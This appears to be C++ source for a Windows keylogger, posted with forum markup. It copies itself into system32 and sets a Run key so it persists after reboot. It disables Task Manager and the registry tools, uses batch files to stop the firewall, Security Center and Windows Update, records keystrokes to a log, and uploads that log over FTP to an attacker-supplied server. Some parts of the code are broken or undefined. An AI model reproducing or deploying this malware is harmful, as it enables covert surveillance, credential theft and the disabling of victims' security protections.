int main()
{
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil);
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
char sys[MAX_PATH];
GetModuleFileName(GetModH, path, sizeof(path));
GetSystemDirectory(sys, sizeof(sys));
strcat(sys, "[URL="file://\\borg.exe"]\\borg.exe[/URL]");
CopyFile(path, sys, false);
HKEY hKey, hKey2;
unsigned char reg[2] = "0";
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
RegCloseKey(hKey),(hKey2);
DeleteFile("C:\\WINDOWS\\system32\\log.txt");
ofstream FWUP;
FWUP.open("C:\\WINDOWS\\system32\\update.bat");
FWUP<<"@echo off\n";
FWUP<<"net stop ""Security Center""\n";
FWUP<<"net stop SharedAccess\n";
FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL %0\n";
FWUP.close();
ofstream disable;
disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
disable<<"@echo off\n";
disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Syste?m"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
disable.close();
//write ur ftp-information's here
ofstream log;
log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
log<<"OPEN ftpserver\n";
log<<"USER username\n";
log<<"ftppassword\n";
log<<"ASCII\n";
log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
log<<"BYE\n";
log<<"exit\n";
log.close();
ofstream Ausgabe;
Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
Ausgabe<<"bye\n";
Ausgabe<<"exit\n";
Ausgabe.close();
ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);
ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);
DWORD OpenBatch;
HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
while(true)
{
// 0% CPU
Sleep(5);
for(int i = 8; i < 191; i++)
{
if(GetAsyncKeyState(i)&1 ==1)
{
TempString = GetKey (i);
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}